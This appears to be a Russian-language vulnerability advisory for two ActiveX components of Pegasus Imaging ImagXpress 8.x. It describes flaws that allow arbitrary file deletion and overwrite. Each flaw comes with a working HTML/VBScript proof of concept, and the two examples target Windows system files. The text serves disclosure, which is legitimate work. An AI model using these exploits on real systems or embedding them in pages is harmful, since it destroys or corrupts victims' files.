Программа: Pegasus Imaging ImagXpress 8.x

Найденная уязвимость позволяет перезаписать произвольные файлы на целевой системе.

1) Уязвимость существует из-за ошибки в проверке входных данных в PegasusImaging.ActiveX.ThumbnailXpres.1 ActiveX компоненте (PegasusImaging.ActiveX.ThumnailXpress1.dll) в свойстве "CacheFile". Атакующий может удалить произвольные файлы на целевой системе.

Пример:

<object classid='clsid:F3379712-5D3C-4F57-92D9-09AC0657719A' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
test.CacheFile = "c:\windows\system_.ini"
MsgBox "Exploit completed."
End Sub
</script>

2) Уязвимость существует из-за ошибки в проверке входных данных в PegasusImaging.ActiveX.ImagXpress.8 ActiveX компоенте (PegasusImaging.ActiveX.ImagXpress8.dll) в методе "CompactFile()".
Атакующий может перезаписать произвольные файлы на целевой системе.

Пример:

<object classid='clsid:6277B638-833D-4315-9D78-60FC451DAF07' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
test.CompactFile "c:\windows\system32\cmd.exe", "c:\windows\system_.ini"
MsgBox "Exploit completed."
End Sub
</script>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии